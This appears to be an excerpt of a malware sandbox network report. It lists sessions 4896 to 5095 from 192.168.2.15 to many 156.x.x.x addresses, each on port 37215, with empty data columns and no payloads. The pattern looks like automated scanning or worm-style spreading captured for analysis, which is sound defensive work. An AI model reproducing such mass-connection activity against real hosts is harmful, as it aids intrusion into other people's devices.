                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4896192.168.2.1549306156.36.148.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4897192.168.2.1550830156.48.220.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4898192.168.2.1559548156.202.196.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4899192.168.2.1543146156.170.252.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4900192.168.2.1549350156.173.98.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4901192.168.2.1543974156.11.204.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4902192.168.2.1544552156.173.66.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4903192.168.2.1550254156.158.222.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4904192.168.2.1560050156.189.7.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4905192.168.2.1537414156.6.14.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4906192.168.2.1546274156.225.68.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4907192.168.2.1536332156.238.227.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4908192.168.2.1560384156.48.144.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4909192.168.2.1540594156.247.173.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4910192.168.2.1557606156.206.129.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4911192.168.2.1547138156.13.35.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4912192.168.2.1539598156.254.111.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4913192.168.2.1546672156.137.127.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4914192.168.2.1558036156.136.65.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4915192.168.2.1545114156.46.159.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4916192.168.2.1554760156.13.94.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4917192.168.2.1546428156.125.38.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4918192.168.2.1546814156.92.32.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4919192.168.2.1556312156.243.21.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4920192.168.2.1544834156.42.108.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4921192.168.2.1553244156.207.64.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4922192.168.2.1548234156.222.233.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4923192.168.2.1543692156.215.107.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4924192.168.2.1536170156.187.27.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4925192.168.2.1549412156.94.190.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4926192.168.2.1551232156.2.209.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4927192.168.2.1559588156.1.157.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4928192.168.2.1549462156.115.236.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4929192.168.2.1553846156.10.103.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4930192.168.2.1553566156.165.50.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4931192.168.2.1555180156.156.103.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4932192.168.2.1555602156.92.228.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4933192.168.2.1541278156.229.208.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4934192.168.2.1540946156.208.57.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4935192.168.2.1551022156.217.224.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4936192.168.2.1533398156.181.23.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4937192.168.2.1547596156.202.226.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4938192.168.2.1554070156.46.49.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4939192.168.2.1539778156.176.197.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4940192.168.2.1555712156.59.134.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4941192.168.2.1548334156.99.185.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4942192.168.2.1547146156.242.121.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4943192.168.2.1549864156.76.136.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4944192.168.2.1551162156.175.232.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4945192.168.2.1534018156.175.17.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4946192.168.2.1547760156.25.223.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4947192.168.2.1536182156.99.58.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4948192.168.2.1546482156.56.52.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4949192.168.2.1540464156.1.88.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4950192.168.2.1535886156.165.80.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4951192.168.2.1560866156.76.107.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4952192.168.2.1534106156.91.225.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4953192.168.2.1557796156.41.46.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4954192.168.2.1547844156.42.228.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4955192.168.2.1545796156.117.111.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4956192.168.2.1539646156.231.170.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4957192.168.2.1560540156.200.34.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4958192.168.2.1534198156.114.158.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4959192.168.2.1553638156.120.219.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4960192.168.2.1550610156.130.15.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4961192.168.2.1548902156.14.164.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4962192.168.2.1551920156.24.131.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4963192.168.2.1535260156.98.101.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4964192.168.2.1538964156.228.36.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4965192.168.2.1544504156.193.30.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4966192.168.2.1558220156.61.194.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4967192.168.2.1558118156.145.50.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4968192.168.2.1534090156.194.156.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4969192.168.2.1533562156.216.245.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4970192.168.2.1536986156.69.65.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4971192.168.2.1540834156.67.44.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4972192.168.2.1554476156.250.229.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4973192.168.2.1557788156.140.71.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4974192.168.2.1556352156.247.161.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4975192.168.2.1543596156.174.58.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4976192.168.2.1553200156.229.98.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4977192.168.2.1535952156.231.209.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4978192.168.2.1538170156.46.232.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4979192.168.2.1542896156.125.23.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4980192.168.2.1557430156.221.38.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4981192.168.2.1546462156.95.128.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4982192.168.2.1550578156.84.81.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4983192.168.2.1539974156.172.199.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4984192.168.2.1550742156.239.188.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4985192.168.2.1552102156.141.154.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4986192.168.2.1542200156.147.160.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4987192.168.2.1559764156.170.139.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4988192.168.2.1544272156.216.189.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4989192.168.2.1557934156.153.251.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4990192.168.2.1552252156.16.15.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4991192.168.2.1554352156.247.90.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4992192.168.2.1556286156.92.158.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4993192.168.2.1550518156.30.111.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4994192.168.2.1541928156.235.50.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4995192.168.2.1559922156.59.189.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4996192.168.2.1551284156.59.27.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4997192.168.2.1546562156.68.58.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4998192.168.2.1559184156.207.254.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4999192.168.2.1539932156.40.120.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5000192.168.2.1552902156.211.31.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5001192.168.2.1547596156.106.60.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5002192.168.2.1534868156.25.239.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5003192.168.2.1548988156.205.107.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5004192.168.2.1558742156.207.24.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5005192.168.2.1544356156.14.237.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5006192.168.2.1555720156.76.97.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5007192.168.2.1549072156.158.240.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5008192.168.2.1542912156.66.217.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5009192.168.2.1558732156.103.157.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5010192.168.2.1556836156.47.254.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5011192.168.2.1556282156.215.83.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5012192.168.2.1543782156.121.152.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5013192.168.2.1559058156.202.11.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5014192.168.2.1550692156.96.65.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5015192.168.2.1555090156.141.63.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5016192.168.2.1542078156.109.124.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5017192.168.2.1547070156.98.72.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5018192.168.2.1545408156.93.251.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5019192.168.2.1558814156.247.28.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5020192.168.2.1542038156.203.221.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5021192.168.2.1536810156.245.225.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5022192.168.2.1533760156.17.140.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5023192.168.2.1559650156.140.79.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5024192.168.2.1553522156.153.11.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5025192.168.2.1536632156.17.161.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5026192.168.2.1545946156.214.118.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5027192.168.2.1556738156.51.38.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5028192.168.2.1533972156.177.251.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5029192.168.2.1546402156.0.138.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5030192.168.2.1542624156.113.177.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5031192.168.2.1557986156.176.124.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5032192.168.2.1555684156.182.112.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5033192.168.2.1548094156.130.90.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5034192.168.2.1555064156.68.33.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5035192.168.2.1544278156.25.73.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5036192.168.2.1545372156.157.113.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5037192.168.2.1555186156.35.51.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5038192.168.2.1555256156.42.14.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5039192.168.2.1546990156.96.89.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5040192.168.2.1539628156.230.57.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5041192.168.2.1542642156.195.90.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5042192.168.2.1540134156.230.180.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5043192.168.2.1559884156.194.98.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5044192.168.2.1558436156.233.54.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5045192.168.2.1559696156.209.177.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5046192.168.2.1547038156.215.228.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5047192.168.2.1536704156.20.12.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5048192.168.2.1552330156.237.83.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5049192.168.2.1551944156.131.15.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5050192.168.2.1538792156.106.35.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5051192.168.2.1557112156.165.160.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5052192.168.2.1536694156.198.12.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5053192.168.2.1537092156.31.118.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5054192.168.2.1552288156.153.195.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5055192.168.2.1535532156.50.254.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5056192.168.2.1558382156.64.232.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5057192.168.2.1533242156.168.227.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5058192.168.2.1553414156.195.99.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5059192.168.2.1551732156.94.10.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5060192.168.2.1545676156.6.119.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5061192.168.2.1546196156.23.196.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5062192.168.2.1537010156.145.7.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5063192.168.2.1540964156.82.160.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5064192.168.2.1543814156.33.56.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5065192.168.2.1545924156.9.217.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5066192.168.2.1543054156.232.128.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5067192.168.2.1546908156.29.180.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5068192.168.2.1536156156.214.195.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5069192.168.2.1532796156.193.212.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5070192.168.2.1549464156.93.99.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5071192.168.2.1555872156.154.30.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5072192.168.2.1539618156.7.123.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5073192.168.2.1549196156.227.34.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5074192.168.2.1534032156.171.99.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5075192.168.2.1553966156.29.25.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5076192.168.2.1539218156.36.109.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5077192.168.2.1540742156.105.96.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5078192.168.2.1550872156.138.178.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5079192.168.2.1552910156.223.140.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5080192.168.2.1539300156.168.109.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5081192.168.2.1551900156.91.48.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5082192.168.2.1554662156.55.164.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5083192.168.2.1559172156.17.146.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5084192.168.2.1556512156.200.130.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5085192.168.2.1538046156.117.114.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5086192.168.2.1544750156.48.173.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5087192.168.2.1558350156.215.8.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5088192.168.2.1558696156.98.224.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5089192.168.2.1535168156.153.102.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5090192.168.2.1534786156.68.84.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5091192.168.2.1533546156.120.25.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5092192.168.2.1546140156.30.150.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5093192.168.2.1552206156.14.246.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5094192.168.2.1536288156.9.58.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5095192.168.2.1538144156.114.246.837215
